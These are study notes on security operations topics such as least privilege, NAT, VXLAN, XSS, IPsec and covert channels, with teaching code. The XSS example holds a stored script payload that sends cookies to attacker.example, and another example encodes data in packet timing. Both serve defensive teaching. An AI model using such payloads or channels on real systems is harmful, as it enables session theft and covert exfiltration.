Managing Security Operations
The primary purpose of security operations is to secure the organization's information assets, people and infrastructure.
# Key Concepts
Entitlement - The set of privileges granted to a user.
Aggregation/Authorization Creep (Privilege Creep) - Privileges a user accumulates over time, typically kept after role changes. Countermeasure: periodic User Entitlement Review (UER).
Need to know - Access granted only to the data resources a user needs to perform their duties.
Least Privilege - Users are granted only the privileges (actions, not just data) necessary to perform the assigned task. Helps prevent and limit violations.
Separation of Duties - A critical job is split so that no single person can complete it alone. Helps prevent fraud, since it forces collusion.
Collusion - Two or more people conspiring to commit a violation together; separation of duties raises the bar by requiring it.
Job Rotation - Periodically moving staff from one role to another; reduces dependence on one person and helps detect fraud.
Mandatory Vacation - Requiring employees to take leave so that someone else performs their duties, which helps detect fraud or irregularities.
Privileged Account Management (PAM) - Tighter control, monitoring and logging of administrator, root and service accounts.
# Managing Information Lifecycle
Create (classify the data) -> Store -> Use -> Share -> Archive -> Destroy
- Service Level Agreement (SLA) - Usually an agreement between the organization and a vendor. It defines performance expectations (e.g. uptime, response times) and includes penalties if a party does not meet them.
- Memorandum of Understanding (MOU) - Similar to an SLA but less formal; no financial stipulation or penalties are involved.
Preventing and responding to incidents
Disaster Recovery Planning
Investigation and Ethics*
What is Sensitive Data?
# Personally Identifiable Information (PII): Any information that can be used to identify, contact or locate an individual (name, ID number, address, biometric data, etc.).
# Protected Health Information (PHI): Any data element relating to an individual's health, treatment or payment for care. HIPAA protects PHI in the US.
# Proprietary Data: Confidential data belonging to an organization, e.g. intellectual property, merger plans, acquisition plans.
# Data in Motion: Data traversing a network (as opposed to data at rest on storage and data in use in memory); protected with transport encryption such as TLS or IPsec.
Managing Sensitive Data
Marking or labelling the data, transporting it securely, storing it securely, and destroying it when it is no longer needed.
Methods of Removing Data: erasing (simple delete), clearing (overwriting), purging (e.g. degaussing, multiple overwrites) and physical destruction.
Roles & Responsibilities related to Data: data owner, data custodian, data user.
NAT (Network Address Translation) rewrites private internal addresses to a public address at the network edge. Its original purpose was to conserve the IPv4 address space (IPv4 addresses are 32 bits, about 4.3 billion in total); hiding the internal addressing from the outside is a side effect that is often listed as a benefit.
Private IP ranges (RFC 1918, not routable on the Internet):
Class A - 10.0.0.0/8 (10.x.x.x)
Class B - 172.16.0.0/12 (172.16.x.x - 172.31.x.x)
Class C - 192.168.0.0/16 (192.168.x.x)
NAT also gives some privacy, since outside parties see only the shared public address, not the identity of the internal host. Remember that GDPR treats an IP address as personal data (PII).
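As an added example (not from these notes), a Python model of the two points above: an RFC 1918 check plus a minimal port-based NAT (NAPT/PAT) table that shows why the outside only ever sees the shared public address and why unsolicited inbound packets are dropped. The addresses and port numbers are constructed (203.0.113.x and 198.51.100.x are documentation ranges).

```python
import ipaddress

# RFC 1918 private ranges, the same three blocks listed above, in CIDR form
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(ip: str) -> bool:
    """True when ip falls in one of the RFC 1918 ranges (not routable on the Internet)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


class PortNat:
    """Minimal NAPT/PAT model: many private hosts share one public address.

    Outbound flows get a translated (public_ip, public_port); inbound packets are
    delivered only if a matching mapping exists, otherwise they are dropped.
    """

    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.outbound_map = {}   # (src_ip, src_port, dst_ip, dst_port) -> public_port
        self.inbound_map = {}    # (public_port, remote_ip, remote_port) -> (src_ip, src_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Translate a packet leaving the private network; returns the header seen outside."""
        if not is_private(src_ip):
            raise ValueError(f"{src_ip} is not an RFC 1918 address")
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.outbound_map:
            port = self.next_port
            self.next_port += 1
            self.outbound_map[key] = port
            self.inbound_map[(port, dst_ip, dst_port)] = (src_ip, src_port)
        return (self.public_ip, self.outbound_map[key], dst_ip, dst_port)

    def inbound(self, remote_ip, remote_port, public_port):
        """Reverse translation for a reply; None means unsolicited, i.e. dropped."""
        return self.inbound_map.get((public_port, remote_ip, remote_port))
```

Real NAT devices also age mappings out and handle ICMP and fragmentation corner cases; the model only keeps the translation table, which is enough to see that the remote side learns nothing about 192.168.x.x hosts beyond a shared public address and port.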
Virtual LAN (VLAN): Logically segments a network into separate Layer 2 broadcast domains without altering the physical topology.
Other virtualization technologies:
- Virtual Desktop (VDI): the user's desktop runs on a central server and is reached by remote access; an extension of application virtualization.
- Storage Area Network (SAN): block storage presented to servers over a dedicated network.
- Software Defined Networking (SDN): separates the control plane from the forwarding plane so the network is programmed centrally (makes the organization less vendor dependent).
Virtual Extensible LAN (VXLAN):
As organizations move workloads to the cloud, Cloud Service Providers (CSPs) need to isolate far more tenants than VLANs allow. VXLAN encapsulates Layer 2 frames inside UDP (port 4789) so that a segment can span a routed Layer 3 network, which solves the scalability limit of VLANs and provides benefits that VLANs cannot.
- VXLAN uses a 24-bit VNI (VXLAN Network Identifier), giving about 16 million segments, vs 4094 usable VLANs from the 12-bit VLAN ID.
VXLAN is needed because VLANs do not scale.
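Added example, not part of the original notes: Python pack/parse routines for an 802.1Q tag and a VXLAN header, showing the 12-bit vs 24-bit identifier fields behind the 4094 vs 16 million figures, plus encapsulation of a constructed Ethernet frame the way a VTEP would build the UDP payload. Field layouts follow IEEE 802.1Q and RFC 7348; the sample frame bytes are constructed.

```python
import struct

VLAN_TPID = 0x8100            # 802.1Q tag protocol identifier
VLAN_ID_BITS = 12
VXLAN_VNI_BITS = 24
VXLAN_UDP_PORT = 4789         # IANA port for VXLAN (RFC 7348)
VXLAN_FLAG_VNI_VALID = 0x08   # the "I" bit in the VXLAN flags byte


def vlan_id_valid(vid: int) -> bool:
    """12-bit VLAN ID; 0 (priority-only tag) and 4095 are reserved, leaving 4094 usable."""
    return 1 <= vid <= (1 << VLAN_ID_BITS) - 2


def vni_valid(vni: int) -> bool:
    """24-bit VNI, giving 2**24 = 16,777,216 possible segments."""
    return 0 <= vni < (1 << VXLAN_VNI_BITS)


def build_dot1q_tag(vid: int, pcp: int = 0, dei: int = 0) -> bytes:
    """4-byte 802.1Q tag: TPID (16 bits) + TCI (PCP 3 bits, DEI 1 bit, VID 12 bits)."""
    if not vlan_id_valid(vid):
        raise ValueError(f"VLAN ID {vid} out of range")
    tci = (pcp << 13) | (dei << 12) | vid
    return struct.pack("!HH", VLAN_TPID, tci)


def parse_dot1q_tag(tag: bytes) -> int:
    """Return the VLAN ID carried in an 802.1Q tag."""
    tpid, tci = struct.unpack("!HH", tag[:4])
    if tpid != VLAN_TPID:
        raise ValueError("not an 802.1Q tag")
    return tci & 0x0FFF


def build_vxlan_header(vni: int) -> bytes:
    """8-byte VXLAN header: flags(8) | reserved(24) | VNI(24) | reserved(8)."""
    if not vni_valid(vni):
        raise ValueError(f"VNI {vni} out of range")
    return struct.pack("!II", VXLAN_FLAG_VNI_VALID << 24, vni << 8)


def parse_vxlan_header(hdr: bytes) -> int:
    """Return the VNI from a VXLAN header, refusing headers without the I flag."""
    flags_word, vni_word = struct.unpack("!II", hdr[:8])
    if not (flags_word >> 24) & VXLAN_FLAG_VNI_VALID:
        raise ValueError("VXLAN I flag not set, VNI not valid")
    return vni_word >> 8


def encapsulate(inner_frame: bytes, vni: int) -> bytes:
    """UDP payload a VTEP would send: VXLAN header followed by the original Ethernet frame."""
    return build_vxlan_header(vni) + inner_frame


def decapsulate(udp_payload: bytes):
    """Reverse: returns (vni, inner_frame). A VTEP uses the VNI to pick the tenant segment."""
    return parse_vxlan_header(udp_payload[:8]), udp_payload[8:]
```

The VNI is the only thing separating tenants once frames are on the shared underlay, so a VTEP must never accept a VNI from a source it has not learned for that segment; the parser here only validates the header format.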
Stored XSS: The attacker finds a vulnerable website and injects malicious script into content the server stores (for example a comment). When other users load that page, the stored script is served as part of the page and runs in their browsers automatically; no click on anything is required.
XSS attacks usually target blogs, forums and other places where user-supplied content is shown to other users.
There are three types of XSS:
1) Persistent/Stored XSS - the payload is saved on the server and served to every visitor.
2) Non-persistent/Reflected XSS - the payload travels in the request (e.g. a URL parameter) and is echoed back in the response; the victim must be lured to the crafted link.
3) DOM-based XSS - client-side script writes untrusted data into the DOM; the server response itself need not contain the payload.
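Added example (not code from the original notes): a Python rendering of stored comments the way a vulnerable forum does it, next to the output-encoded version, and a reflected variant for contrast. The comments and the attacker.example domain are constructed.

```python
import html

# Constructed comments, as a forum's database would store them. The second one is an
# attacker's stored payload; attacker.example is a placeholder domain.
COMMENTS = [
    "Great post, thanks!",
    '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>',
]


def render_vulnerable(comments):
    """Stored XSS: untrusted stored text is concatenated straight into the HTML."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_hardened(comments):
    """Output-encode for the HTML element context: <, >, &, and quotes become entities."""
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments) + "</ul>"


def search_page_reflected(query: str) -> str:
    """Reflected XSS: the value comes from the request (e.g. ?q=...) and is echoed back unescaped."""
    return f"<p>Results for {query}</p>"


def carries_script_tag(page: str) -> bool:
    """Crude check a reviewer might run on rendered output: is a raw <script> tag present?"""
    return "<script" in page.lower()
```

Escaping at output time for the right context (here HTML element content) is the fix; input filtering alone is bypassable, and attributes, URLs and JavaScript contexts each need their own encoding. DOM-based XSS needs the same care in client-side code, for instance assigning to textContent rather than innerHTML.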
Internet Protocol Security (IPsec) is a standard architecture for setting up a secure channel between two entities. The entities can be two hosts, two routers, two gateways, or a host and a gateway. IPsec provides confidentiality, authentication, integrity and anti-replay protection; the bulk traffic is protected with symmetric keys, which IKE negotiates using public key cryptography (certificates or pre-shared keys together with Diffie-Hellman).
IPsec relies on Security Associations (SAs), one per direction, which hold the negotiated algorithms and keys. It has two main protocols:
1) Authentication Header (AH) - Provides message integrity and data-origin authentication for the payload and most of the IP header, plus anti-replay; no confidentiality. (CISSP material also lists non-repudiation, although the HMAC that AH uses cannot strictly provide it.)
2) Encapsulating Security Payload (ESP) - Provides confidentiality (encryption) and, optionally, integrity and authentication of the packet payload. Sequence numbers in both AH and ESP prevent replay attacks (an attacker capturing a packet and re-sending it later).
The primary use of IPsec is VPNs. IPsec can operate in two modes:
1) Tunnel mode - The entire original IP packet (header + payload) is protected and wrapped in a new IP header; typically used between gateways.
2) Transport mode - Only the payload is protected; the original IP header stays in the clear; typically used host-to-host.
Covert channels are mechanisms that transmit information over a path not originally intended for data transmission.
They are generally unauthorized and hidden, used to send information in violation of the information security policy.
*Covert Storage Channels* - One process writes to a shared storage location (a file, a disk block, a file attribute or an unused packet header field) that another process reads. The channel may be visible to everyone but is understood only by the communicating parties.
* Steganography is an example of a covert storage channel. Example: hiding a message or a picture inside an image or a PDF document.
*Covert Timing Channel* - One process relays information to another by modulating its use of a system resource (CPU, disk, network). Example: interleaving illegitimate traffic with legitimate traffic so that the timing of the packets, not their content, carries the message.
* Cache Timing Attacks
* Cache memory sits between the processor and main memory and is used for faster access. A cache timing attack measures whether a memory access is fast (cache hit) or slow (cache miss) to infer what another process has touched, which can leak data such as key-dependent table lookups; the shared cache acts as the resource for a timing channel.
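Added example, not from the original notes, for the covert timing channel described above: a Python simulation in which a sender spaces packets so that the inter-arrival gaps, not the payloads, carry message bits, with a receiver that decodes the gaps and a simple detector that flags the bimodal gap distribution. Gap values, jitter, the baseline traffic generator and the binning parameters are all constructed.

```python
import random

# Constructed channel parameters: a short inter-packet gap encodes 0, a long gap encodes 1.
SHORT_GAP = 0.05
LONG_GAP = 0.20
THRESHOLD = (SHORT_GAP + LONG_GAP) / 2


def encode_timestamps(message: str, start: float = 0.0, jitter: float = 0.02, seed: int = 1):
    """Arrival times of otherwise legitimate-looking packets whose spacing carries the message."""
    rng = random.Random(seed)
    times = [start]
    for byte in message.encode():
        for i in range(7, -1, -1):                 # most significant bit first
            gap = LONG_GAP if (byte >> i) & 1 else SHORT_GAP
            gap += rng.uniform(-jitter, jitter)    # simulated network jitter, kept below half the gap spacing
            times.append(times[-1] + gap)
    return times


def decode_timestamps(times) -> str:
    """Receiver side: threshold each inter-arrival gap back into a bit, then pack bytes."""
    bits = [1 if b - a > THRESHOLD else 0 for a, b in zip(times, times[1:])]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return out.decode(errors="replace")


def legitimate_timestamps(n: int = 200, seed: int = 2):
    """Constructed baseline: gaps spread uniformly, as ordinary bursty traffic might look."""
    rng = random.Random(seed)
    times = [0.0]
    for _ in range(n):
        times.append(times[-1] + rng.uniform(0.01, 0.5))
    return times


def looks_like_timing_channel(times, bin_width: float = 0.05, share: float = 0.9) -> bool:
    """Detector heuristic: a two-level code piles gaps into two bins; normal traffic spreads out."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    counts = {}
    for g in gaps:
        b = round(g / bin_width)
        counts[b] = counts.get(b, 0) + 1
    top_two = sum(sorted(counts.values(), reverse=True)[:2])
    return top_two / len(gaps) >= share
```

The detector trades false positives for simplicity: constant-rate traffic also clusters into one or two bins, so in practice it would be combined with a baseline profile of the flow. The channel itself shows why packet content inspection alone does not close covert channels; the payloads here could be perfectly ordinary.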